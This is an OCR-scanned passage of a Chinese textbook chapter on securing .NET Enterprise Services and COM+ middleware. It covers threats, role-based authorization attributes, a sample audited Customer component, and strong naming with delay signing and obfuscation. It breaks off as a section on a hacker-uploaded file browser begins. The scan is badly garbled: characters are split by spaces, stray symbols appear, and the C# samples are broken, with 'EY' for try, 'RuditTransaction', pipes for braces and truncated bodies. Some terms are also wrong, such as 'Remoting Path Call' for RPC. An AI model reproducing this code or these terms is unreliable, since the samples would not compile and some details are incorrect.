通常 ， 企 业 服务 组 件 的 作用 是 封装 应 用 程序 的 业务 和 数据 访问 逻辑 ， 主 要 在 应 用 程序 
中 间 层 要 求 使 用 基础 结构 服务 〈 如 分 布 式 事务 、 对 象 池 、 队 列 组 件 等 ) 时 使 用 。 企 业 服务 
应 用 程序 一 般 位 于 中 间 层 的 应 用 程序 服务 器 ， 如 图 7-1 所 示 。 





Web 服 务 器 Er 数据 库 服务 器 


| Web | 
| 应 用 程序 | 

















企业 服务 服务 器 应 用 程序 
(DLLbost.exe) 











图 7-1 企业 服务 组 件 的 作用 
企业 服务 组 件 安全 主要 面临 的 几 类 威胁 及 其 解决 方式 : 
1. 网 络 窃 昕 


企业 服务 应 用 程序 一 般 在 中 间 层 应 用 程序 服务 器 中 运行 ， 它 与 Web 服务 器 的 距离 较 
远 。 因 此 ， 必 须 防 止 网 络 窃听 者 捕获 敏感 的 应 用 程序 数据 。 一 般 做 法 是 在 Web 和 应 用 程序 
服务 器 之 间 使 用 Intemet 协议 安全 性 (IP Secuity，IPSec) 加 密 通 道 ， 该 解决 方案 常用 于 
Intemet 数据 中 心 。 
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另外 ， 服 务 组 件 还 支持 远程 过 程 调用 (Remoting Path Call，RPC) 数据 包 级 身份 验证 。 
该 技术 可 提供 基于 数据 包 的 加 密 ， 常 用 于 确保 与 基于 桌面 的 客户 端的 通信 安全 。 
2. 未 经 授权 的 访问 
未 经 授权 的 访问 对 于 用 户 和 应 用 程序 都 是 危险 的 。 通 过 启用 基于 COM+ 角 色 的 授权 (在 


默认 情况 下 ， 在 Microsoft Windows 2008/Vista 系统 中 禁用 ) ， 可 禁止 匿名 用 户 的 访问 ， 提 
供 基 于 角色 的 授权 ， 从 而 控制 了 对 服务 组 件 受 限 操作 的 访问 。 


3. 无 约束 的 委派 








如 果 在 Windows 2008/Vista 系统 中 启用 委派 ， 允 许 远 程 服务 器 使 用 客户 端 模 拟 令 牌 访 
问 网 络 资源 ， 这 种 委派 就 是 无 约束 的 。 这 意味 着 ,用 户 可 创建 无 限 多 的 网 络 跃 点 (Network 
Hop) 。 针 对 这 种 情况 ，Microsoft Windows Server 2008/Vista 引入 了 受 约束 的 委派 。 


4. 配置 数据 的 泄露 

很 多 应 用 程序 都 使 用 对 象 构造 函数 字符 串 在 COM+ 目 录 中 保存 敏感 数据 (如 数据 库 连 
接 字 符 串 ) 。 这 些 字符 串 在 对 象 创建 时 ，COM+ 检 索 并 传递 给 该 对 象 。 如 果 要 在 目录 中 保 
存 敏 感 的 配置 数据 ， 首 先 需要 对 数据 进行 加 密 。 


5. 抵赖 

如 果 用 户 和 否认 执行 了 某 项 操作 或 事务 ， 而 又 没有 足够 的 证 据 反 驳 ， 则 产生 抵赖 威胁 ， 
这 时 必须 在 所 有 应 用 程序 层 执行 审核 工作 , 服务 组 件 应 该 在 中 间 层 记录 用 户 的 活动 。 通常， 
服务 组 件 有 访问 原始 调用 者 身份 的 权限 , 这 主要 应 对 前 端的 Web 应 用 程序 常 在 企业 服务 方 
案 中 启用 模拟 的 特点 。 


如 图 7-2 所 示 ， 更 好 地 理解 企业 服务 组 件 安全 威胁 以 及 一 些 常见 服务 组 件 漏洞 。 





网 络 窃听 超 特权 的 run=as 身 份 无 约束 委派 




















图 7-2 组 件 安全 威胁 
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7.2 ”如何 设计 中 间 件 


设计 和 编写 安全 的 服务 组 件 必须 考虑 一 些 重要 事项 ， 其 中 主要 包括 以 下 几 点 : 
基于 角色 的 授权 ; 

敏感 数据 的 保护 ; 

审核 要 求 ; 

应 用 程序 激活 类 型: 

事务 ; 

代码 访问 安全 性 。 

， 基 于 角色 的 授权 


对 于 使 用 COM+ 基 于 角色 的 有 效 授权 ， 必 须 确保 原始 调用 者 的 安全 上 下 文 ， 这 样 就 能 
基于 调用 者 的 组 成 员 身份 执行 基于 角色 的 粒度 授权 。 如 果 ASP.NET Web 应 用 程序 调用 一 
个 服务 组 件 ， 表 示 该 Web 应 用 程序 要 在 调用 这 个 组 件 前 模拟 它 的 调用 者 。 


2. 敏感 数据 的 保护 


如 果 服 务 组 件 要 处 理 敏感 数据 (如 雇员 详细 信息 、 财 务 事务 和 健康 记录 ) ， 请 确保 这 
些 信 息 在 网 络 中 传输 的 安全 。 如 果 应 用 程序 不 在 安全 的 Internet 数据 中 心 (IDC) 环境 (由 
IPSec 提供 传输 级 加 密 ) 中 运行 ， 可 选择 使 用 RPC 加 密 。 为 此 ， 必 须 使 用 隐私 性 身份 验证 。 
有 关 详 细 信 息 ， 请 参阅 本 章 后 面 的 敏感 数据 保护 部 分 。 


3， 审核 要 求 


要 解决 抵赖 问题 ， 必 须 记录 企业 服务 组 件 执 行 的 敏感 事务 。 在 设计 时 ， 需 要 审核 的 操 
作 类 型 ， 以 及 应 记录 的 详细 信息 。 其 中 应 至 少 包括 启动 事务 的 身份 信息 和 执行 事务 的 身份 
信息 。 

4. 应 用 程序 激活 类 型 


开发 人 员 在 应 用 程序 设计 时 应 该 明确 服务 组 件 激活 的 方式 ， 可 以 使 用 Dllhost.exe 进程 
的 实例 激活 ， 也 可 在 客户 端 进程 中 运行 。 服 务 器 应 用 程序 在 Dllhost.exe 进程 外 运行 。 基 于 
加 解密 库 的 应 用 程序 在 客户 端 进程 的 地 址 空间 中 运行 。 由 于 缺少 进程 间 的 通信 ， 使 用 加 解 
密 库 的 应 用 程序 效率 更 高 。 

5. 事务 

如 果 打 算 使 用 分 布 式 事务 ， 需 要 考虑 事物 在 何 处 启动 ， 以 及 在 防火 墙 分 隔 的 组 件 和 资 
源 管 理 器 间 运 行事 务 的 后 果 。 本 书 的 建议 是 防火 墙 必须 支持 Microsoft 公司 的 分 布 式 事务 处 
理 协 调 器 (Distributed Transaction.Controller，DTC) 通信 。 


如 果 现 实 中 ， 服 务 组 件 的 物理 部 署 体系 结构 包括 一 个 中 间 层 应 用 程序 服务 器 ， 通 常 应 
尽量 从 应 用 程序 服务 器 中 的 企业 服务 启动 事务 ， 而 不 是 从 前 端 web 应 用 程序 中 启动 。 


. 124. 
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6. 代码 访问 安全 性 


通常 使 用 服务 组 件 的 应 用 程序 都 是 可 以 完全 信任 的 。 因 此 ， 代 码 访问 安全 性 在 授权 调 
用 代码 方面 作用 有 限 。 但 是 ， 企 业 服务 要 求 调用 方 必须 有 必要 的 权限 来 调用 非 托 管 代 码 ， 
这 种 要 求 的 结果 是 无 法 直接 从 部 分 信任 的 Web 应 用 程序 中 调用 数据 到 企业 服务 应 用 程序 
中 。ASP.NET 的 部 分 信任 级 别 〈 高 、 中 等 、 低 和 最 低 ) 不 授予 非 托 管 代码 权限 。 如 果 要 从 
部 分 信任 应 用 程序 中 调用 服务 组 件 ， 必 须 通 过 沙 盒 (sandbox) 方式 来 处 理 这 些 调 用 服务 组 
件 的 特权 代码 。 


7.3 设计 中 间 件 的 权限 


通常 组 件 程序 使 用 Windows 身份 验证 。 而 具体 是 选择 通用 的 NTLM 验证 还 是 Kerberos 
验证 ， 则 由 客户 端 和 服务 器 的 操作 系统 决定 。 一 般 来 说 ，Windows 2008 或 Windows Server 
2003 环境 使 用 Kerberos 身份 验证 ， 其 余 的 则 使 用 通用 的 NTLM 验证 。 

在 构建 组 件 时 ， 首 要 问题 是 确保 所 有 的 调用 都 进行 了 身份 验证 ， 这 样 可 以 防止 匿名 用 
户 访 问 组 件 功 能 。 

1. 使 用 调用 级 别 的 身份 验证 


要 拒绝 匿名 调用 者 ， 至 少 要 使 用 调用 级 别 的 身份 验证 。 可 通过 向 服务 组 件 程序 集 添 加 
以 下 属性 代码 进行 设置 : 

[assembly:ApplicationAccessControl( 

Authentication = AuthenticationOption.Call)] 


全 注意 : 该 方式 等 同 于 在 组 件 服务 中 将 应 用 程序 的 Properties ( 属性 ) 对 话 框 的 Security ( 安 
全 性 ) 选项 卡 的 Authentication level for calls (调用 的 身份 验证 级 别 ) 设置 为 
Call ( 调用) 。 


2. 授权 


企业 服务 使 用 COM+ 角 色 进 行 授权 ， 可 以 控制 对 应 用 程序 、 组 件 、 接 口 和 方法 的 授权 
粒度 。 要 防止 用 户 执 行 应 用 程序 服务 组 件 所 展示 的 受 限 操作 ， 下 面 是 操作 步 又 : 

1) 启用 基于 角色 的 安全 性 

在 默认 情况 下 , 操作 系统 Windows Serevr 2008 禁用 基于 角色 的 安全 功能 。 但 Windows 
Server 2003 正好 相反 。 为 了 确保 在 组 件 注册 ( 常 使 用 Regsvcs.exe) 时 自动 启用 基于 角色 的 
安全 性 ， 需 要 将 以 下 属性 添加 到 您 的 服务 组 件 程 序 集中 : 


[assembly:ApplicationAccessControl (true)] 
全 注意 ; 该 方式 等 同 于 在 组 件 服务 中 选择 应 用 程序 的 Properties ( 属性 ) 对 话 框 的 Security 
(安全 性 ) 选项 卡 的 Enforce access checks for this application (为 此 应 用 程序 强制 
访问 检查 ) 。 








Se 
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2) 启用 组 件 级 访问 检查 
为 了 支持 组 件 、 接 口 或 方法 级 角色 检查 ， 必 须 启 用 组 件 级 访问 检查 。 为 了 确保 在 注册 
组 件 时 自动 启用 组 件 级 访问 检查 ， 需 要 将 以 下 属性 添加 到 服务 组 件 程序 集中 : 


[assembly:ApplicationAccessControl (AccessChecksLevel= 
AccessChecksLevelOption.ApplicationComponent)] 


全 注意 ; 这 等 同 于 在 组 件 服务 中 选择 应 用 程序 的 Properties ( 属性) 对 话 框 的 Security ( 安 
全 性 ) 选项 卡 的 Perform access checks at the process and component level ( 在 进程 
和 组 件 级 执行 访问 检查 ) 。 


3) 强制 组 件 级 访问 检查 

要 允许 单个 组 件 执 行 访问 检查 ， 必 须 强制 组 件 级 访问 检查 。 该 设置 仅 当 应 用 程序 安全 
级 别 被 设置 为 上 述 进 程 和 组 件 级 时 才 有 效 。 为 了 确保 在 注册 组 件 时 自动 启用 组 件 级 访问 检 
查 ， 需 要 将 以 下 属性 代码 添加 到 服务 组 件 类 : 


[ComponentAccessControl (true)] 

public class YourServicedComponent :ServicedComponent 
| 

| 





全 注意 : 这 等 同 于 在 组 件 服务 中 选择 组 件 的 Properties 对 话 框 的 Security ( 安全 性 ) 选项 卡 
的 Enforce component level access checks ( 强制 组 件 级 访问 检查 ) 。 


3. 配置 管理 


除了 COM+ 通 过 组 件 服务 工具 提供 给 管理 员 的 可 配置 设置 外 ， 开 发 人 员 常 在 代码 中 使 
用 与 配置 相关 的 函数 。 例 如 ， 用 于 检索 保存 在 COM+ 目 录 中 的 对 象 结构 字符 串 的 函数 。 在 
企业 服务 中 进行 配置 管理 时 应 考虑 下 列 主要 问题 : 

1) 使 用 特权 最 少 的 账户 

在 开发 期 间 ， 请 使 用 特权 最 少 的 本 地 账户 《而 不 是 交互 用 户 账户 ) 来 运行 和 测试 服务 
组 件 。 尽 量 使 该 账户 符合 管理 员 在 实际 环境 中 使 用 的 运行 账户 。 

2) 避免 在 对 象 构造 函数 字符 串 中 保存 机 密 信息 

如 果 在 COM+ 目 录 中 的 对 和 象 构造 函数 字符 串 中 保存 机 密 信息 (如 数据 库 连 接 字 符 串 和 
密码 ) ， 任 何 本 地 管理 员 组 成 员 都 可 以 查看 这 些 纯 文本 数据 ， 所 以 要 尽量 避免 保存 机 密 数 
据 。 如 果 必 须 保存 ， 需 要 对 数据 进行 加 密 。DPAPI 加 密 方法 是 一 种 很 好 的 实施 选择 ， 它 免 
去 了 与 密 钥 管理 相关 的 问题 。 在 运行 时 , 检索 对 象 结构 字符 串 并 使 用 DPAPI 对 数据 进行 解 
密 。 下 面 的 代码 示例 演示 了 在 构造 函数 时 保存 敏感 数据 的 方法 : 











[ConstructionEnabled (Default="")] 
public class YourServicedComponent :ServicedComponent, ISomeInterface 


{ 
// 首先 调用 对 象 构造 函数 
public YourServicedComponent () {} 


// 然后 将 对 象 结构 字符 串 传递 给 Construct 方法 


protected override void Construct (string constructstring) 


{ 
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// 使 用 DPAPI 解密 配置 数据 

3 

3) 避免 无 约束 的 委派 

对 服务 组 件 客户 端 使 用 NTLM 验证 还 是 Kerberos 验证 由 具体 环境 决定 。 操 作 系 统 
Windows Server 2008 的 Kerberos 验证 支持 无 约束 的 委派 , 意味 着 使 用 客户 端 凭据 可 创建 无 
限 多 网 络 跃 点 ， 这 种 情况 应 该 尽量 避免 。 如 果 客 户 端 是 ASP.NET， 可 设置 Machine.config 
中 <processModel> 元 素 的 comImpersonation 属性 来 配置 模拟 级 别 : 

comImpersonationLevel=" [Default |Anonymous|Identify|Impersonate|lDelegate]" 

企业 服务 服务 器 应 用 程序 定义 的 模拟 级 别 决定 了 所 有 与 服务 组 件 通信 的 远程 服务 器 
的 模拟 能 力 。 在 本 例 中 ， 服 务 组 件 是 客户 端 。 可 以 指定 服务 组 件 的 模拟 级 别 并 在 服务 组 件 
是 客户 端 时 使 用 ， 使 用 的 属性 代码 如 下 : 


[assembly:ApplicationAccessControl( 
ImpersonationLevel=ImpersonationLevelOption.Identify)] 


全 注意 : 这 等 同 于 在 组 件 服务 中 设置 应 用 程序 的 Properties ( 属性 ) 对 话 框 的 Security ( 安 
全 性 ) 页 的 Impersonation Level ( 模拟 级 别 ) 值 。 


表 7-1 所 示 为 描述 了 各 模拟 级 别 的 效果 。 


表 7-1 模拟 级 别 
模拟 级 别 说 明 
匿名 服务 器 无 法 识别 客户 端 
识别 允许 服务 器 识别 客户 端 并 使 用 客户 端 访 问 令 牌 执行 访问 检查 
模拟 允许 服务 器 使 用 客户 端 凭据 访问 本 地 资源 
委派 允许 服务 器 使 用 客户 端 凭据 访问 远程 资源 〈 要 求 Kerberos 验证 和 特定 


账户 配置 





7.4 一 个 中 间 件 的 实例 


前 面 几 节 介绍 了 与 服务 组 件 和 企业 服务 应 用 程序 所 面临 的 威胁 和 对 策 ， 下 面 将 通过 范 
例 代码 说 明 建立 安全 组 件 的 步骤 ， 即 通过 简单 Customer 类 实现 的 安全 服务 组 件 。 

首先 需要 设置 程序 集 文 件 ， 演 示 文 件 名 称 为 assemblyinfo.cs， 它 是 每 一 个 VS.NET 软 
件 必 备 的 一 个 程序 集 文件 。 下 面 代码 演示 的 是 使 用 regsvcs.exe 在 企业 服务 中 注册 服务 组 件 
程序 集 ， 并 且 配置 COM+ 目 录 的 程序 集 级 元 数据 : 

// (1) 程序 集 有 一 个 强 名 称 

[assembly:AssemblyKeyFile(@"..\..\Customer.snk")] 


// 企业 服务 配置 
[assembly:ApplicationName ("CustomerService")] 
[assembly:Description("Customer Services Application")] 


2 


无 懈 可 击 





全 方位 构建 安全 Web 系统 


// (2) 服务 器 应 用 程序 - 在 dllhost .exe 进程 实例 中 运行 
[assembly:ApplicationActivation (ActivationOption.Server)] 

// (3) 启用 组 件 级 访问 检查 

// (4) 指定 调用 级 身份 验证 

// (5) 指定 下 游 调用 的 身份 模拟 级 别 
[assembly:ApplicationAccessControl( 
AccessChecksLevel=AccessChecksLevelOption.ApplicationComponent, 
Authentication=AuthenticationOption.Call, 
ImpersonationLevel=ImpersonationLevelOption.Identify)] 


上 述 的 代码 有 下 列 5 个 安全 特征 《由 注释 行 中 的 数字 标识 ) 。 

(1) 程序 集 是 强 命名 的 ， 强 命名 代表 引用 服务 组 件 的 唯一 性 。 从 安全 角度 看 ， 这 样 做 
的 优点 是 程序 集 拥 有 唯一 的 数字 签名 。 这 意味 着 ， 攻 击 者 的 任何 修改 都 将 被 删除 ， 程 序 集 
将 无 法 加 载 。 

(2) 应 用 程序 在 专用 dllhost.exe 实例 中 运行 。 这 样 就 可 以 在 部 署 时 指定 特权 最 少 的 身 


份 运行 。 
(3) 应 用 程序 支持 组 件 级 访问 检查 ， 这 样 就 可 以 利用 类 ， 接 口 和 方法 所 属 的 角色 向 调 
用 者 授权 。 


(4) 指定 了 调用 级 别 身 份 验证 。 这 意味 着 ， 所 有 来 自 客户 端的 方法 调用 都 要 进行 验证 。 
(5) 从 该 服务 组 件 到 远程 服务 器 中 其 他 组 件 的 调用 的 模拟 级 别 是 “识别 ”。 这 意味 着 ， 
下 游 组 件 可 识别 原始 调用 者 ， 但 不 能 执行 模拟 。 


全 注意 : 调用 ASP.NET Web 应 用 程序 或 Web 服务 客户 端的 模拟 级 别 在 客户 端 Web 服务 
器 Machine.config 文件 的 <processModel> 元 素 中 指定 。 


下 面 演示 的 用 户 类 Customer 告诉 读者 如 何 安全 配置 该 类 的 各 方法 。 其 中 方法 
AuditTransaction 会 检查 调用 者 的 权限 ， 如 果 为 非 指定 的 角色 则 报错 。 
用 户 类 Customer 代码 如 下 : 


namespace busCustomer 
| 
// (1) 支持 方法 级 授权 的 显 式 接口 定义 
public interface ICustomerAdmin 
{ 
void CreditAccountBalance (string customerID, double amount); 
} 
// (2) 强制 组 件 级 访问 检查 
[ComponentAccessControl] 
public sealed class Customer :ServicedComponent, ICustomerAdmin 
{ 
Private string appName = "Customer"; 
private string eventLog = "Application"; 
// ICustomer 实现 
// (3) 对 CreditAccountBalance 的 访问 被 限制 在 Manager 和 Senior Manager 
// 角色 的 成 员 中 
[SecurityRole ("Manager")] 
[SecurityRole ("Senior Manager")] 
public void CreditAccountBalance (string customerID, double amount) 
{ 
// (4) 保护 实现 的 结构 化 异常 处 理 
EY 
{ 
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// (5) 检查 是 否 启用 了 安全 性 
if (ContextUtil.IsSecurityEnabled) 
\ 
// 仅 Manager 可 对 账户 进行 
// ”$1,000 以 上 的 贷 记 
if (amount > 1000) 
让 
// (6) 编程 方式 检查 贷 记 操作 的 授权 
if (ContextUtil.IsCallerInRole("Senior Manager")) { 


// 调用 数据 访问 组 件 来 更 新 数据 库 


// (7) 审核 事务 


RuditTransaction (customerID, amount); 


} 
else { 
throw new SecurityException("Caller not authorized"); 
} 
} 
} 
else { 


throw new SecurityException("Security is not enabled"); 
} 
} 
catch( Exception ex) 
{ 
// 记录 异常 详细 信息 
throw new Exception("Failed to credit account balance for customer: "+ 
customerID, ex); 
} 
} 
private void AuditTransaction(string customerID, double amount) 
{ 
// (8) 从 调用 上 下 文 获取 原始 调用 者 身份 ， 目 的 是 进行 日 志 记 录 
SecurityIdentity caller = SecurityCallContext .CurrentCall .OriginalCaller; 
try 
i 
if (!EventLog.SourceExists (appName)) 
{ 
EventLog.CreateEventSource (appName, eventLog); 
} 
StringBuilder logmessage = new StringBuilder(); 
logmessage.AppendFormat ("{0}User {1} performed the following transaction" 
+ "{2} Account balance for customer {3} " 
+ "credited by {4}", 
Environment .NewLine, caller.AccountName, 
Environment .NewLine, customerID, amount); 
EventLog.WriteEntry (appName, logmessage.ToString(), 
EventLogEntryType.Information); 


catch (SecurityException secex) 
{ 
throw new SecurityException( 

"Event source does not exist and cannot be created", secex); 











通过 阅读 上 述 用 户 类 Customer 可 以 得 出 下 列 安全 特征 〈 由 注释 行 中 的 数字 标识 ) : 
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(1) 接口 的 定义 和 实现 是 显 式 的 ， 支 持 使 用 COM+ 和 角色 的 接口 和 方法 级 授权 。 

(2) 在 类 级 别 使 用 [ComponentAccessControl] 属 性 启用 类 的 组 件 级 访问 检查 。 

(3) 在 CreditAccountBalance 方法 中 使 用 [SecurityRole] 属 性 ， 将 访问 限制 在 Manager 
或 Senior Managers 角色 成 员 中 ; 

(4) 使 用 结构 化 异常 处 理 保护 实现 。 异 常 被 捕获 后 记 入 日 志 ， 调 用 者 可 收 到 相应 的 











异常 。 
(5) 代码 在 显 式 的 角色 检查 之 前 要 检查 是 否 启 用 了 安全 性 。 这 是 一 种 风险 缓解 的 策略 ， 
可 确保 事务 在 管理 员 无 意 或 有 意 禁用 应 用 程序 安全 配置 时 无 法 执行 。 如 果 禁 用 了 安全 性 ， 
IsCallerImRole 方法 将 始终 返回 true。 

(6) 调 用 者 必须 是 Manager 或 Senior Manager 角色 的 成 员 ( 因 为 方法 中 声明 了 安全 性 )。 
为 了 实现 精确 的 授权 粒度 ， 代 码 显 式 检 查 了 调用 者 的 角色 成 员 资 格 。 

(7) 事务 要 进行 审核 。 

(8) 审核 可 使 用 SecurityCallContext 对 象 获 取 原 始 调用 者 的 身份 。 

通常 ， 使 用 服务 组 件 的 应 用 程序 都 是 完全 信任 的 。 因 此 ， 代 码 访问 安全 性 在 授权 代码 
调用 方面 作用 有 限 。 代 码 调用 必须 考虑 在 服务 组 件 中 激活 并 执行 跨 上 下 文 的 调用 ， 必 须 有 
非 托管 代码 权限 。 

如 果 服 务 组 件 的 客户 端 是 ASP.NET Web 应 用 程序 ， 其 信任 级 别 必须 是 “完全 ”， 如 
下 所 示 : 

<trust level="Full" /> 

如 果 Web 应 用 程序 配置 了 “完全 ”以 外 的 信任 级 别 ， 它 将 没有 非 托管 代码 权限 。 在 本 
实例 的 情况 下 必须 创建 一 个 经 沙 盒 处 理 的 包装 程序 集 来 封装 与 服务 组 件 的 通信 。 此 外 还 必 
须 配置 代码 访问 安全 性 策略 来 授予 包装 程序 集 以 非 托管 代码 权限 。 

如 果 将 服务 组 件 的 引用 传递 给 不 信任 的 代码 ， 不 能 从 该 代码 中 调用 服务 组 件 定义 的 方 
法 。 这 一 规则 的 例外 是 不 要 求 上 下 文 切换 或 侦 听 服务 ， 且 不 调用 System.EnterpriseServices 
成 员 方法 ， 这 样 的 方法 可 由 不 信任 代码 调用 。 

















7.$5 强 签名 与 反 编 译 


任何 时 候 软 件 安全 与 版 权 保护 都 是 很 重要 的 ， 特 别 是 企业 级 开发 或 一 些 特殊 应 用 。 本 
节 主 要 讨论 .NET 平台 下 组 件 强 签名 与 代码 的 反 编 译 预防 。 

强 命名 程序 集 可 以 确保 程序 集 唯一 ， 而 不 被 算 改 、 冒 用 等 。 即 使 相同 名 字 的 程序 集 其 
签名 也 会 不 同 。 

读者 可 以 通过 如 图 7-3 所 示 的 内 容 ， 理 解 强 签名 前 后 程序 集结 构 的 变化 。 

假设 程序 集 名 字 叫 WindowsApplication1， 签 名 前 后 程序 集 信 息 对 比如 下 : 


WindowsApplicationl, Version=1.0.0.0, Culture=neutral, PublicKeyToken 
=null 

WindowsApplicationl, Version=1.0.0.0, Culture=neutral, 
PublicKeyToken=05a89399ef69f490 


hs 
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PE 文件 头 


CLT 文 件 头 


A 数字 签名 





图 7-3 签名 组 件 的 变化 


如 果 项 目 中 引用 了 一 个 已 签名 的 程序 集 adll， 而 遭 到 一 个 伪造 的 a.dll 来 偷梁换柱 ， 主 


应 用 程序 中 发 生 了 无 法 处 理 的 异常 。 如 果 单 击 “ 继 续 ”， 应 用 程 
四 车 此 铺 访 并 兰 维 经 ， 如 果 单 击 扫 朋 出 ”， 应 用 程序 将 立 


未 能 加 载 文件 或 程序 集 “myCommon，Yersion=1.0.0.0， 
Culture=neutral, PublicKeyToken=05a89399ef69£490” 或 它 的 


其 王 人 代入 到: 找到 的 程序 集 清单 定义 与 程序 集 引 用 不 匹 距 。 【 
异常 来 目 HRESULT:0x80131040)。 





图 7-4 签名 组 件 的 变化 


未 签名 的 主 程序 可 以 引用 已 签名 或 未 签名 的 程序 集 ， 而 已 签名 的 主 程序 则 不 能 引用 未 
签名 的 程序 集 。 

程序 集 在 进行 强 签名 后 就 有 了 唯一 标识 ， 可 以 在 程序 中 了 解 程序 集 的 来 源 ， 获 取 当 前 
执行 的 程序 集 信息 或 调用 的 程序 集 信息 ， 演 示 代 码 如 下 : 


System.Reflection.Assembly.GetExecutingAssembly () 
System.Reflection.Assembly.GetCallingAssembly() 





如 果 要 生成 密 钥 及 签名 , 可 以 使 用 .NET SDK 中 的 sn.exe 命令 行 工具 , 或 Visual Studio 
软件 菜单 项 中 选择 “项 目 ” 一 “属性 ”一 “签名 ”， 如 图 7-5 所 示 。 

密 钥 如 果 进 行 了 密码 保护 , 则 生成 p 食 文件 , 没有 密码 保护 则 生成 snk 文件 , pfx 比 snk 
格式 的 文件 更 大 些 。 

对 于 反 编 译 来 说 ， 现 在 最 常 使 用 的 就 是 混淆 技术 。 混 淆 技术 对 编译 生成 的 MSIL 中 间 
代码 进行 模糊 处 理 ， 随 着 混淆 的 加 重 ， 人 脑 进行 多 方面 智力 思维 的 能 力 逐 渐 降低 ， 保 护 了 
源 代码 ， 提 高 了 反 编译 的 难度 。 这 种 模糊 处 理 并 不 改变 程序 执行 的 逻辑 。 








对 所 
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引用 路 径 详细 信息 @@) 
时 间 改 服务 器 WRLQU 
签名 * 
安全 性 回 为 程序 集 签名 &) 
选择 强 名 称 密 钥 文件 区 ): 
和 yo snk 加 |。 下 到 客 凤 (@) 
口 充 延 迟 蕉 名 加 ) 
延迟 签名 后 ， 项 目 将 不 会 运行 ， 也 不 能 进行 调试 。 











图 7-5 签名 设置 


混淆 的 工具 有 很 多 ， 如 DotFuscator、ObfuscatorNET、XeonCode、MaxtoCode 等 。 

既 对 程序 集 签 名 又 做 混淆 处 理 也 是 可 以 的 ， 而 强 命名 后 的 程序 集 如 果 做 混淆 会 产生 有 异 
常 ， 程 序 也 无 法 正常 执行 。 正 确 的 做 法 是 : 延迟 签名 一 开发 完成 一 混淆 一 重新 签名 〈 即 先 
延迟 签名 ， 混 淆 后 再 签名 ) 。 

混淆 后 再 签名 ， 可 以 使 用 sn 命令 的 及 选项 完成 ; 

sn -R a.exe mykey.snk ”// 使 用 mykey .snk 密 钥 对 a.exe 重新 签名 


延迟 签名 (重新 签名 以 前 ) 程序 是 不 能 运行 的 ， 在 .NET cf 会 报 异 常 。 团 队 开发 中 不 可 
能 每 个 人 都 知道 私 钥 ， 一 般 的 做 法 是 创建 一 个 包含 公 钥 部 分 的 .snk 文件 。 
sn - p mykey.snk publicKey.snk 


publicKey.snk 在 开发 阶段 供 开 发 人 员 使 用 ， 发 布 时 用 mykey.snk 重新 进行 签名 。 

应 用 程序 组 件 的 安全 性 要 依赖 Windows 安全 性 ， 需 要 验证 调用 者 的 身份 并 进行 授权 。 
授权 是 使 用 含 Windows 组 或 用 户 账户 的 COM+ 角 色 来 配置 并 控制 的 ,与 企业 服务 应 用 程序 
和 服务 组 件 相关 的 大 多 数 威胁 都 可 通过 可 靠 的 编码 技术 和 正确 的 目录 配置 来 解决 。 

开发 人 员 必 须 使 用 显 式 属 性 来 进行 服务 组 件 的 安全 配置 。 这 些 属 性 决定 了 应 用 程序 首 
次 在 企业 服务 中 注册 ( 常 使 用 Regsvcs.exe) 的 方式 。 

实际 上 ， 并 不 是 所 有 的 安全 配置 设置 都 使 用 属性 来 设置 ， 对 于 权限 控制 区 域 的 代码 ， 
管理 员 需 要 为 服务 器 应 用 程序 指定 运行 时 拥有 的 角色 。 此 外 ， 管 理 员 还 必须 在 部 署 时 根据 
Windows 组 或 用 户 账户 来 填充 角色 。 








7.6 “如何 操作 存储 系统 


假设 黑客 上 传 了 一 个 程序 ， 用 来 查看 目录 和 文件 。 通 过 这 个 程序 黑客 可 以 浏览 所 有 用 
户 的 ASP.NET 程序 ， 也 可 以 查看 服务 器 的 系统 日 志 ， 当 然 ， 还 可 以 轻易 地 对 文件 进行 自 
改 和 删除 。 为 了 更 清楚 地 解释 这 一 问题 ， 有 必要 简单 介绍 一 下 IO 文件 操作 现在 存在 的 
问题 。 

在 NET 中 , 系统 IO 操作 的 功能 变 得 很 强大 , 但 是 随 之 带 来 一 个 严重 的 问题 :ASPNET 





Ys 


第 7 章 编写 安全 中 间 件 


具有 一 项 新 功能 ， 即 组 件 不 需 使 用 regsvr32 进行 注册 ， 只 需 将 dll 类 库 文件 上 传 到 bin 目录 
下 就 可 以 直接 使 用 。 这 一 功能 确实 给 开发 ASP.NET 程序 带 来 了 很 大 的 方便 , 但 是 却 使 ASP 
中 将 此 dll 删除 或 改名 方法 失去 了 效用 ， 防 范 此 问题 的 发 生 就 变 得 更 加 困难 。 


1. 文件 系统 操作 实例 


在 开始 编写 代码 之 前 ， 有 必要 了 解 一 下 实例 需要 用 到 的 几 个 主要 的 类 。 这 几 个 类 都 在 
System.IO 名 称 空间 下 ，System.IO 名 称 空 间 包 含 允 许 在 数据 流 和 文件 上 进行 同步 和 异步 读 
写 的 类 。 

在 整个 应 用 程序 的 开始 部 分 , 需要 了 解 一 下 服务 器 的 系统 信息 , 这 里 需要 用 到 System 
Environment 类 ， 该 类 提供 当前 环境 和 平台 的 信息 以 及 操作 它们 的 方法 。 通 过 System. 
Environment 类 可 以 得 到 系统 的 当前 目录 和 系统 目录 , 可 以 帮助 开发 人 员 更 快 的 发 现 关键 目 
录 。 另 外 ， 还 可 以 通过 获取 运行 当前 进程 的 用 户 名 了 解 ASP.NET 程序 运行 所 使 用 的 用 户 ， 
进一步 设置 用 户 权限 以 避免 这 一 安全 问题 。 

要 使 用 System.IO 名 称 空间 的 其 他 几 个 类 如 下 : 

口 System.IO.Directory: 提供 用 于 创建 、 移 动 和 枚 举 通过 目录 和 子 目录 的 静态 方法 

口 System.IO.File: 提供 用 于 创建 、 复 制 、 删 除 、 移 动 和 打开 文件 的 静态 方法 的 类 。 

口 System.IO.FileInfo: 提供 创建 、 复 制 、 删 除 、 移 动 和 打开 文件 的 实例 方法 的 类 。 

口 System.IO.StreamReader: 实现 一 个 TextReader， 以 一 种 特定 编码 从 字 节 流 中 读 取 

字符 。 

上 述 每 个 类 的 属性 和 方法 的 具体 用 法 将 以 代码 注释 的 方式 在 程序 中 加 以 说 明 。 
System.IO 名 称 空 间 在 .NET 框架 提供 的 mscorlib.dll 中 ， 在 使 用 VS.Net 编程 之 前 需要 将 此 
dll 引用 到 项 目 中 。 

所 编写 的 程序 都 使 用 了 Codebehind 方式 ， 即 每 一 个 aspx 程序 都 有 一 个 对 应 的 aspx.cs 
程序 ，aspx 程序 中 只 涉及 页 面 显示 相关 的 代码 ， 所 有 轴 辑 实现 的 代码 都 放 在 相应 的 aspx.cs 
文件 中 ， 做 到 了 显示 与 逻辑 的 分 离 。 

下 面 介绍 几 个 主要 类 的 关键 方法 ; 

